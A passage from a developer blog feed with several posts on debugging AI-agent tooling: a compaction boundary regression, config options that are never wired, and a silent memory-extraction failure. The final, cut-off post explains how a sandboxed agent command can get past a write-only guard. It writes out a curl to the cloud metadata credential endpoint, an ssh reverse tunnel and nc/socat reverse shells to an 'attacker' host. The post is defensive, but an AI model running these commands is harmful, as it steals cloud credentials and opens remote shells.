&lt;p&gt;Two views of the same session disagreed. The &lt;strong&gt;trigger&lt;/strong&gt; and the &lt;strong&gt;wrapup planner&lt;/strong&gt; measured eligible history from the last compartment end to the protected tail: ~2.98M tokens, ~94 chunks — and fired every pass. The &lt;strong&gt;boundary resolver&lt;/strong&gt; — the code that actually picks the chunk to compact — concluded the eligible end was &lt;code&gt;6&lt;/code&gt;, which is &lt;em&gt;at the floor itself&lt;/em&gt;. Eligible end equals offset means: nothing is drainable. The range collapsed to empty.&lt;/p&gt;

&lt;p&gt;When a resolver returns a boundary exactly at its floor, the question to ask is not "is there work?" — the trigger already answered that. The question is &lt;strong&gt;"what made the floor the ceiling?"&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The 9-token compartment was the same collapse, one step earlier
&lt;/h2&gt;

&lt;p&gt;The one compartment the session &lt;em&gt;did&lt;/em&gt; build (9 tokens) was the tell. &lt;code&gt;/ctx-wrapup&lt;/code&gt; (the manual drain command) showed the same shape: chunk 1 resolved to messages 6–7 (~173 tokens) — a sliver — and once that drained, the next pass found nothing, leaving ~2.98M tokens still "eligible" but unreachable.&lt;/p&gt;

&lt;p&gt;So the empty compartment wasn't a one-off. It was the visible tip of the same arithmetic running every pass: the resolver's eligible range was a handful of tokens, not the 2.98M the trigger believed in.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the trace found
&lt;/h2&gt;

&lt;p&gt;Reading the boundary code on the released version (v0.41.2 — the version the user's doctor output showed actually loaded, in an extension cache, one minor behind the 0.41.3 CLI):&lt;/p&gt;

&lt;p&gt;The historian applies a per-run head cap by cutting tokens forward from the offset (&lt;code&gt;applyHeadCap&lt;/code&gt;, protected-tail-boundary.ts:341). But when that cut lands &lt;strong&gt;inside a completed tool-arc exchange&lt;/strong&gt; — the invocation message before the cut, its result message after it — a whole-exchange fence pulls the eligible end back to the exchange's first invocation (read-session-true-raw-tokens.ts:500, returning at :533). And when the exchange starts right at the front of the head (message 6 in the user's numbering), the fence returns the publication floor: &lt;code&gt;lastCompartmentEndOrdinal + 1&lt;/code&gt; = the offset.&lt;/p&gt;

&lt;p&gt;Cut lands inside exchange → fence pulls end back to the exchange start → exchange starts at the offset → &lt;code&gt;end &amp;lt;= offset&lt;/code&gt; → &lt;strong&gt;eligibleEnd = offset&lt;/strong&gt;. Empty head. Every pass.&lt;/p&gt;

&lt;p&gt;The user's geometry made it certain: at their ~60% threshold, the per-run head cap was ~31k tokens (~0.25 × usable), and in a long agentic turn a single tool batch over 31k tokens is &lt;em&gt;common&lt;/em&gt;. Once that shape sat at the head of eligible history, every pass — trigger or wrapup — resolved to nothing. The "9-token compartment" was the sliver &lt;em&gt;before&lt;/em&gt; the exchange's first invocation.&lt;/p&gt;

&lt;p&gt;Checking the other released tags settled it: &lt;strong&gt;v0.41.2 and v0.41.3 had no escape&lt;/strong&gt; — the file was unchanged between them. The default branch, however, had the fix already written, and the v0.41.4 release notes described the user's symptom verbatim.&lt;/p&gt;

&lt;h2&gt;
  
  
  "It used to make a lot of compartments before 0.41.0" — the key date
&lt;/h2&gt;

&lt;p&gt;The user's most valuable sentence was buried in the report: &lt;em&gt;"It used to make a lot of compartments before version 0.41.0."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The maintainer's confirmation landed within hours of the trace:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;the "before 0.41.0 it made a lot of compartments" observation was the key date.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Commit &lt;code&gt;f32d6986&lt;/code&gt; (shipped in &lt;strong&gt;0.41.0&lt;/strong&gt;, a TS↔Rust parity alignment) changed the boundary behavior: where the pre-0.41.0 code admitted the first oversized exchange &lt;em&gt;whole&lt;/em&gt;, the new code fenced &lt;strong&gt;backward&lt;/strong&gt; to the starting offset instead. When the first exchange after the boundary is bigger than the per-run cap, backward fencing is an empty head. One small alignment commit flipped a working guard into a permanently empty one — and the guard kept logging "working" because the no-op was its designed output for an empty range.&lt;/p&gt;

&lt;p&gt;The fix (v0.41.4, published the same day) restores admit-whole at any pressure, and the maintainer's pass found &lt;strong&gt;two further defects on the same path&lt;/strong&gt;: the chunk reader could stop its own budget inside a completed exchange, and the pre-flight could truncate the producer's source text while keeping the whole-range metadata — so even an admitted exchange would have arrived clipped. A 190k-token exchange now reaches the historian whole, with regression tests.&lt;/p&gt;

&lt;h2&gt;
  
  
  What makes this worth remembering
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;A firing guard is not a working guard.&lt;/strong&gt; A no-op line every pass is a heartbeat, not a result. If the output of a guard that "runs constantly" is an empty compartment, the guard is failing in the most reliable way possible — and its logs will look &lt;em&gt;healthier&lt;/em&gt; than a guard that simply never triggers, because they show activity.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;"Used to work before X" is a regression date, not a vague complaint.&lt;/strong&gt; The single most useful diagnostic sentence in the report was the version boundary. Regression hunting should start by diffing the release tags around that boundary — the diff is usually small (here it was one commit).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;When a resolver returns its own floor, read the floor.&lt;/strong&gt; &lt;code&gt;eligibleEnd=6 &amp;lt;= offset=6&lt;/code&gt; is not a measurement of "nothing to do". It is the resolver concluding the &lt;em&gt;only&lt;/em&gt; candidate starts exactly where it is forbidden to start. That shape — a boundary pinned to a floor — is the signature of a fence/cut interaction, not of empty history.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compare the released tags, not just the head.&lt;/strong&gt; The user was one minor behind and the fix already existed on the default branch. Tag-to-tag comparison (0.41.2 vs 0.41.3 vs default) turned "is this a bug in my config?" into "this is fixed in the next release" in one pass.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A fix that adds diagnostics fixes the next ten reports too.&lt;/strong&gt; The v0.41.4 no-op line now names &lt;em&gt;which arm&lt;/em&gt; pinned &lt;code&gt;eligibleEnd&lt;/code&gt; (cap, open-arc clamp, completed-arc fence, or live-prompt floor) with its numbers. The failure that took a code trace to find is now self-diagnosing from one log line. Silent collapse → named failure mode is the upgrade that matters as much as the fix itself.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The thread closed with the maintainer crediting the independent trace: &lt;em&gt;"thanks &lt;a class="mentioned-user" href="https://dev.to/pm25coder"&gt;@pm25coder&lt;/a&gt; for the independent trace; it landed on the same lines."&lt;/em&gt; That is the best possible outcome for a bug report — but the reason it worked is upstream of the credit: the user wrote down the version where behavior changed, the logs printed the resolver's numbers, and the two views disagreeing told us exactly where to read.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>programming</category>
      <category>debugging</category>
    </item>
    <item>
      <title>Advertised but never wired: config options that exist everywhere except the code path</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Sat, 05 Sep 2026 23:54:04 +0000</pubDate>
      <link>https://dev.to/pm25coder/advertised-but-never-wired-config-options-that-exist-everywhere-except-the-code-path-1b0g</link>
      <guid>https://dev.to/pm25coder/advertised-but-never-wired-config-options-that-exist-everywhere-except-the-code-path-1b0g</guid>
      <description>&lt;p&gt;Two issues landed in the agent-CLI ecosystem within a few hours of each other this week, in two different codebases, and neither is about a crash or a wrong result. Both are about a settings key that &lt;strong&gt;exists&lt;/strong&gt; — in the schema, in the docs, in the UI — and then does nothing, because nothing in the execution path ever reads it. The system runs fine. No error. No log. The operator's mental model of their own configuration is simply wrong, and nothing ever re-syncs it.&lt;/p&gt;

&lt;p&gt;This is the config class we've started calling &lt;em&gt;advertised but never wired&lt;/em&gt;, and once you see it you start finding it everywhere. Here are the two instances from this week, the shapes it takes, and a detection checklist you can run against your own stack in about ten minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Instance 1: advertised in three places, read in zero (clio-coder#324)
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/iowarp/clio-coder" rel="noopener noreferrer"&gt;iowarp/clio-coder&lt;/a&gt;, a coding agent for HPC and scientific-software developers, shipped two compaction settings: &lt;code&gt;context.compaction.model&lt;/code&gt; and &lt;code&gt;context.compaction.systemPrompt&lt;/code&gt;. They were advertised in &lt;strong&gt;three&lt;/strong&gt; places:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the settings UI,&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;docs/guide/configuration-reference.md:32-33&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;the settings schema (&lt;code&gt;src/core/config.ts:721-722&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The project's own audit issue (&lt;a href="https://github.com/iowarp/clio-coder/issues/324" rel="noopener noreferrer"&gt;#324&lt;/a&gt;) documented what the execution path actually did, with file:line receipts:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;resolveCompactionModel&lt;/code&gt; (&lt;code&gt;src/entry/orchestrator.ts:533-548&lt;/code&gt;) reads only &lt;code&gt;settings.chat.target&lt;/code&gt; and &lt;code&gt;settings.chat.model&lt;/code&gt;. It never consults &lt;code&gt;context.compaction.model&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;runCompactionFlow&lt;/code&gt; (&lt;code&gt;src/entry/orchestrator.ts:646-690&lt;/code&gt;) calls &lt;code&gt;compact({ entries, model, apiKey, instructions })&lt;/code&gt; and never passes &lt;code&gt;systemPrompt&lt;/code&gt; — even though &lt;code&gt;compact&lt;/code&gt; accepts one (&lt;code&gt;src/domains/session/compaction/compact.ts:103&lt;/code&gt;, default at &lt;code&gt;:458&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So a user who set &lt;code&gt;context.compaction.model&lt;/code&gt; to route compaction through a cheaper model got the chat model, silently. A user who pointed &lt;code&gt;context.compaction.systemPrompt&lt;/code&gt; at a carefully written prompt file got the built-in default, silently. Both controls fell back to defaults with no error, no warning, and no way to tell from the outside that the setting had never been consulted.&lt;/p&gt;

&lt;p&gt;The fix (&lt;a href="https://github.com/iowarp/clio-coder/commit/8e70da27" rel="noopener noreferrer"&gt;8e70da27&lt;/a&gt;, shipped in v0.4.3, ~90 minutes after the issue was written) is worth quoting because it names the actual design principle:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;An explicit but invalid model route or an unreadable prompt file must &lt;strong&gt;fail visibly, never fall back silently&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That sentence is the whole article in miniature. The bug was not the missing wiring — it was the &lt;em&gt;silent default&lt;/em&gt; that the missing wiring produced.&lt;/p&gt;

&lt;h2&gt;
  
  
  Instance 2: one scalar override that deletes the rest of the model's config (openai/codex#42918)
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/openai/codex/issues/42918" rel="noopener noreferrer"&gt;openai/codex#42918&lt;/a&gt; (open as of this writing) is the subtler sibling. Here the option &lt;strong&gt;is&lt;/strong&gt; read — but reading it destroys settings the user never touched.&lt;/p&gt;

&lt;p&gt;The reproduction is a two-command A/B with a single configuration difference:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# run 1: model defaults only&lt;/span&gt;
codex &lt;span class="nt"&gt;-m&lt;/span&gt; gpt-5.6-luna &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-c&lt;/span&gt; features.context_management.experimental_mode&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  debug prompt-input &lt;span class="s1"&gt;'Configuration merge probe.'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="c"&gt;# &amp;lt;context_window_guidance&amp;gt; present: true&lt;/span&gt;

&lt;span class="c"&gt;# run 2: same, plus one scalar override&lt;/span&gt;
codex &lt;span class="nt"&gt;-m&lt;/span&gt; gpt-5.6-luna &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-c&lt;/span&gt; features.context_management.experimental_mode&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-c&lt;/span&gt; features.token_budget.reminder_threshold_tokens&lt;span class="o"&gt;=&lt;/span&gt;14000 &lt;span class="se"&gt;\&lt;/span&gt;
  debug prompt-input &lt;span class="s1"&gt;'Configuration merge probe.'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="c"&gt;# &amp;lt;context_window_guidance&amp;gt; present: false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The reporter's code reading explains the mechanism (rust-v0.153.4):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;has_explicit_settings&lt;/code&gt; returns true for &lt;strong&gt;any&lt;/strong&gt; token-budget key other than two opt-outs.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;TurnContext&lt;/code&gt; construction therefore sets &lt;code&gt;use_model_token_budget_defaults = false&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;resolve_token_budget&lt;/code&gt; returns the user-configured object &lt;strong&gt;directly&lt;/strong&gt;, never merging unspecified fields with the model-provided defaults.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;TokenBudgetConfig::default&lt;/code&gt; leaves &lt;code&gt;guidance_message&lt;/code&gt;, the fallback prompt, and the fallback buffer &lt;strong&gt;unset&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;So a user who wanted an &lt;em&gt;earlier reminder&lt;/em&gt; — one scalar, one key, a timing change — implicitly opted out of the model-provided handoff guidance, the fallback prompt, and the fallback buffer that make summary-free rollover usable. A commenter (&lt;a href="https://github.com/openai/codex/issues/42918" rel="noopener noreferrer"&gt;84dnnvbdvp-debug&lt;/a&gt;) added the sharper consequence: the boolean is captured &lt;strong&gt;once&lt;/strong&gt; at &lt;code&gt;TurnContext&lt;/code&gt; construction, so if the model changes later, the budget re-resolves against the new model's info but the frozen &lt;code&gt;false&lt;/code&gt; keeps suppressing its defaults.&lt;/p&gt;

&lt;p&gt;The issue's own ask is the same principle as clio-coder's fix, stated from the other side:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If whole-object replacement is intentional, please expose that explicitly and warn or reject incomplete handoff configurations instead of silently accepting this combination.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  This is a class, not a coincidence
&lt;/h2&gt;

&lt;p&gt;Two same-week instances in adjacent codebases would already be a signal, but anyone living on the agent side has more. The &lt;a href="https://github.com/anthropics/claude-code/issues/91188" rel="noopener noreferrer"&gt;auto-memory compaction threshold thread&lt;/a&gt; we've been in since early this week (24 comments, four participants) turned out to be about the same disease one level down: the configurable value moves &lt;strong&gt;advice text&lt;/strong&gt;, not the &lt;strong&gt;enforcement threshold&lt;/strong&gt; the name implies, and the unit it measures against (UTF-16 units in one path, bytes in another) is only discoverable by reading source and running measurements — not from the docs, not from an error, not from a prompt. And in an earlier investigation (&lt;a href="https://dev.to/pm25coder/the-extraction-returned-zero-memories-and-nothing-screamed-3c7c"&gt;blogged here&lt;/a&gt;), a failure counter existed in the struct (&lt;code&gt;errors[]&lt;/code&gt;) but was never promoted to metrics — data that was &lt;em&gt;collected&lt;/em&gt; and never &lt;em&gt;read&lt;/em&gt;, which is the same failure of wiring one layer down.&lt;/p&gt;

&lt;p&gt;Four shapes so far:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Shape&lt;/th&gt;
&lt;th&gt;Symptoms&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Advertised, never read&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;key in schema/docs/UI; absent from execution path&lt;/td&gt;
&lt;td&gt;clio-coder#324&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Override resets defaults&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;setting one key drops unspecified keys&lt;/td&gt;
&lt;td&gt;openai/codex#42918&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Advice masquerading as threshold&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;key exists and fires, but its semantics differ from its name; discoverable only via source&lt;/td&gt;
&lt;td&gt;claude-code#91188&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Collected, never promoted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;field populated; no code path ever surfaces it&lt;/td&gt;
&lt;td&gt;OpenViking extraction telemetry&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Why this class is worse than a missing feature
&lt;/h2&gt;

&lt;p&gt;A config option that does nothing is worse than an option that doesn't exist. A missing option is discoverable &lt;em&gt;as missing&lt;/em&gt; — you search, you don't find it, you move on. An advertised-but-unwired option is a &lt;strong&gt;claim the system keeps making while reality diverges underneath it&lt;/strong&gt;: the schema completes, the docs render, the UI saves, the defaults look overridden. The divergence only surfaces later as a production mystery — the compaction that used the expensive model, the rollover that lost the handoff — attributed to anything except a settings key nobody suspected because it looked configured.&lt;/p&gt;

&lt;p&gt;The shared cure, from both instances above: &lt;strong&gt;make the explicit path fail visibly.&lt;/strong&gt; If a user set it, honor it or say why you can't — never silently run the default. Byte-identical behavior when the key is &lt;em&gt;unset&lt;/em&gt; is the only place silent defaulting belongs.&lt;/p&gt;

&lt;h2&gt;
  
  
  Detection checklist (about ten minutes)
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Grep the key in the execution path, not just the config layer.&lt;/strong&gt; If a setting key appears in the schema, the docs, and the UI — but the only code that mentions it is the config parser itself, you have found an advertised-but-never-read option.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Set a sentinel.&lt;/strong&gt; Configure an absurd-but-valid value (a model name that obviously isn't the default, a prompt file containing one unique word). If behavior is byte-identical, the key is dead.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check override semantics.&lt;/strong&gt; For any nested config object: does setting one field merge with defaults, or replace the whole object? If it replaces, one-key changes silently delete sibling defaults. This is the codex#42918 shape and it hides in every config library with a "replace-if-present" pattern.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ask "does this value ever appear in a log, a metric, or a prompt?"&lt;/strong&gt; A field that is populated but never read is a telemetry gap wearing a config costume.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Add a fired-counter.&lt;/strong&gt; When you wire a real option, log the first time its value actually reaches the path. The counter is the cheapest possible proof that the option is alive.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The interesting open question — and the reason this is worth writing now rather than after more data — is how common the class is. Two public instances in one week in two codebases, plus a third thread that spent 24 comments discovering one knob's actual semantics, says "common." But there's no systematic way to find them today: no linter flags a key that is parsed but never consumed, no test asserts that a documented option reaches its call site.&lt;/p&gt;

&lt;p&gt;Which config option have &lt;strong&gt;you&lt;/strong&gt; set and never once seen do anything? The fix is usually to wire it or delete it — the expensive state is the one in between.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>The extraction returned zero memories, and nothing screamed</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Thu, 03 Sep 2026 03:43:27 +0000</pubDate>
      <link>https://dev.to/pm25coder/the-extraction-returned-zero-memories-and-nothing-screamed-3c7c</link>
      <guid>https://dev.to/pm25coder/the-extraction-returned-zero-memories-and-nothing-screamed-3c7c</guid>
      <description>&lt;p&gt;A session commit reported success. The memory extraction produced zero memories. No error dialog, no failed state, no metric that moved. The run was recorded as done, and the model's new knowledge simply evaporated.&lt;/p&gt;

&lt;p&gt;This is the failure mode I want to talk about — not because it is exotic, but because it is the one our tooling is worst at surfacing. It happened in the open on volcengine/OpenViking (issue #4580, with a reported patch), and when you read the report the shape is instantly familiar: &lt;strong&gt;the loop that extracts memories from a conversation has a small number of escape hatches, and every one of them was designed for a different emergency than the one that actually happened.&lt;/strong&gt; Each individual gap is defensible. Together they produce silence.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three small gaps that add up to silence
&lt;/h2&gt;

&lt;p&gt;OpenViking runs an extraction loop that asks a vision-language model to turn a session into memory events, and each iteration expects one of two things back: a structured tool call, or JSON it can parse. The reporter found three ways that expectation fails, all in &lt;code&gt;session/memory/extract_loop.py&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. The model's tool call arrived as leaked markup, not as a tool call.&lt;/strong&gt; Some serving stacks leave the native DSML markup (&lt;code&gt;&amp;lt;｜DSML｜invoke name="..."&amp;gt;&lt;/code&gt;) in the content field instead of the structured &lt;code&gt;tool_calls&lt;/code&gt; channel (same family as vllm-project/vllm#48931). The parser looks in the structured channel, finds nothing, tries to JSON-parse the content, fails. The iteration is wasted. This one is a parsing gap — an input the loop simply never learned to read.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. A prose answer tripped a kill switch meant for a different bug.&lt;/strong&gt; Thinking models occasionally answer an iteration with reasoning — "I need to check existing memories first, let me search..." — which is neither a tool call nor JSON. The loop's failure branch responded by setting &lt;code&gt;_disable_tools_for_iteration = True&lt;/code&gt;. The &lt;em&gt;next&lt;/em&gt; iteration then ran with tools disabled: exactly the opposite of what the model had just said it wanted to do. A flag that was designed for the unknown-tool case (a model trying to call something that doesn't exist) had been reused as a catch-all format-error handler. The model was forced to emit final JSON with no tool results. Hence: zero memories.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. The failure was recorded, but never promoted to a signal.&lt;/strong&gt; On the final failure the loop does record an error (&lt;code&gt;errors=[...]&lt;/code&gt;). But nothing in the commit path surfaced that list to the queue or metrics. So the outside world saw "commit success." The truth lived only in container logs and a per-session &lt;code&gt;.failed.json&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why each one is individually defensible
&lt;/h2&gt;

&lt;p&gt;This is the part that matters, because it's why this bug class keeps winning:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A single format-retry budget is a reasonable design — until the one retry gets consumed by a &lt;em&gt;garbage&lt;/em&gt; response (leaked markup), leaving zero budget for a genuine formatting slip two iterations later. &lt;strong&gt;The retry budget was spent on the wrong enemy.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Reusing a narrow flag (disable tools on unknown tool) as a broad one (disable tools on any parse failure) is the classic "the handler already exists" shortcut. &lt;strong&gt;The punishment didn't fit the crime — it punished the model for the one behavior that would have saved the run.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;An &lt;code&gt;errors&lt;/code&gt; list that exists but is never aggregated is a real observability gap. &lt;strong&gt;A failure that is logged is not a failure that is visible.&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Individually: a parsing gap, a flag misuse, a missing metric. Collectively: &lt;em&gt;"Extraction finished. 0 memories. Nothing to see."&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The checklist I now run against my own loops
&lt;/h2&gt;

&lt;p&gt;What makes this worth writing down is that the checklist is portable. Take it back to any agent loop you maintain — memory extraction, summarization, reflection, post-processing:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Who spends the retry budget?&lt;/strong&gt; Is your format-retry consumed by genuinely malformed output, or can a class of &lt;em&gt;expected-but-unhandled&lt;/em&gt; input (leaked markup, a tool result in the wrong field) burn it first? Separate "input I never taught the parser to read" from "output that broke the contract," and give each its own budget.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does your failure handler punish the model's intent?&lt;/strong&gt; When an iteration fails to parse, what does the &lt;em&gt;next&lt;/em&gt; iteration look like? If a flag meant for "model called a tool that doesn't exist" is also triggered by "model said it wanted to search," you've built a loop where the more reasonable the model is, the more you disable it. Failures should degrade &lt;em&gt;options&lt;/em&gt;, not agency — and a bound (only disable after N consecutive failures) is safer than a single-strike kill switch.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Is there an errors[] that nobody aggregates?&lt;/strong&gt; If your loop already records structured errors, the observability fix is not "add logging" — it's &lt;em&gt;promote the existing list&lt;/em&gt;: a &lt;code&gt;memory_extract.failed&lt;/code&gt; counter, a per-session status, an alert on "commit success with empty result." The hook is usually already there, one level down.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Is "exit 0 + empty result" a possible success?&lt;/strong&gt; This is the real tell. Any pipeline where the success path and the empty-result path share the same terminal state has a silent-failure window. Decide what an &lt;em&gt;empty&lt;/em&gt; result means in your domain (legitimately nothing to extract? or impossible?) — and if it's possible-but-rare, that's exactly the case that needs the counter from point 3.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What happened after
&lt;/h2&gt;

&lt;p&gt;The OpenViking reporter shipped a small additive patch (DSML parsing + keeping tools enabled for one extra iteration after prose), and maintainer-side a fix PR was opened (volcengine/OpenViking#4607). The mechanism is public, readable, and — most importantly — the failure now has a name. A named failure is an enormous upgrade over a silent one.&lt;/p&gt;

&lt;p&gt;Your extraction loops will hit a variant of this eventually. When they do, I hope the first thing you check is not the model — it's whether your failure handling was built for the failure you actually got.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Update (2026-09-04):&lt;/strong&gt; this case kept moving after publication. The maintainers closed #4580 with a boundary call — leaked DSML is DeepSeek's own serialization (the fix belongs in the serving/parser layer, not in OpenViking), and thinking-model prose is a model-side contract question — so the additive patch from the report remains a self-hosted reference (PR #4607 stays open) rather than an upstream merge. The checklist's point 3, kept separate from that boundary debate, is being built upstream: OpenViking PR #4628 promotes &lt;code&gt;failure_kind&lt;/code&gt;, retry outcome and iteration exhaustion into structured extraction telemetry (&lt;code&gt;memory.extract.parse.*&lt;/code&gt; counters plus retry/iteration histograms), on exactly the rationale argued here — "the parse outcome itself is the diagnosable signal, and today it only lives in logs." A zero-extraction session is now answerable from metrics instead of a &lt;code&gt;.failed.json&lt;/code&gt; nobody opens.
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Case: volcengine/OpenViking issue #4580 ("Memory extraction silently yields 0 memories...") with follow-up PR #4607; parser-gap family reference vllm-project/vllm#48931. Mechanism analysis only — check the linked issue for the full patch discussion.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>A credential fetch is a read: the containment guard your write-target sandbox was missing</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Wed, 02 Sep 2026 00:38:03 +0000</pubDate>
      <link>https://dev.to/pm25coder/a-credential-fetch-is-a-read-the-containment-guard-your-write-target-sandbox-was-missing-329m</link>
      <guid>https://dev.to/pm25coder/a-credential-fetch-is-a-read-the-containment-guard-your-write-target-sandbox-was-missing-329m</guid>
      <description>&lt;h1&gt;
  
  
  A credential fetch is a read: the containment guard your write-target sandbox was missing
&lt;/h1&gt;

&lt;p&gt;The mental model most of us have for a sandboxed command is a write model: the sandbox decides what the command may touch, and "touch" means write. Create this file, delete that one, overwrite the other. Our own bash tool does exactly this — the workspace-write tier scans a command for its write targets and blocks any that land outside the allowed area.&lt;/p&gt;

&lt;p&gt;That model has a hole, and the hole is a read.&lt;/p&gt;

&lt;h2&gt;
  
  
  The read that steals a cloud credential
&lt;/h2&gt;

&lt;p&gt;On any cloud host, there is an HTTP endpoint every process can reach that returns the instance's IAM credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl http://169.254.169.254/latest/meta-data/iam/security-credentials/...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;169.254.169.254 is the AWS instance metadata service (IMDS). ECS containers get their credentials at 169.254.170.2; GCP mirrors the pattern at 169.254.169.123 and metadata.google.internal; IMDSv2 has an IPv6 form at fd00:ec2::254. None of these are remote addresses — they are link-local, reachable from inside the sandbox without any network policy. A single curl, a single read, and the credential is in the command's stdout, ready to be sent anywhere.&lt;/p&gt;

&lt;p&gt;A write-target scan passes that command. It writes nothing. It touches no protected file path. The exfiltration happens entirely over the network, in the read direction.&lt;/p&gt;

&lt;h2&gt;
  
  
  The tunnel that turns a read into a channel
&lt;/h2&gt;

&lt;p&gt;The read alone is only useful if the result goes somewhere. The classic move is a reverse tunnel:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh &lt;span class="nt"&gt;-R&lt;/span&gt; 1080:169.254.169.254:80 user@attacker
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now the attacker's box can reach the metadata endpoint through the tunnel, and the sandboxed command just... started ssh. Variants: &lt;code&gt;nc -e /bin/sh attacker 4444&lt;/code&gt;, &lt;code&gt;socat EXEC:/bin/sh TCP:attacker:4444&lt;/code&gt;, and the IMDSv2 token request header (&lt;code&gt;X-aws-ec2-metadata-token&lt;/code&gt;) used to hide the fetch behind an obfuscated command line.&lt;/p&gt;

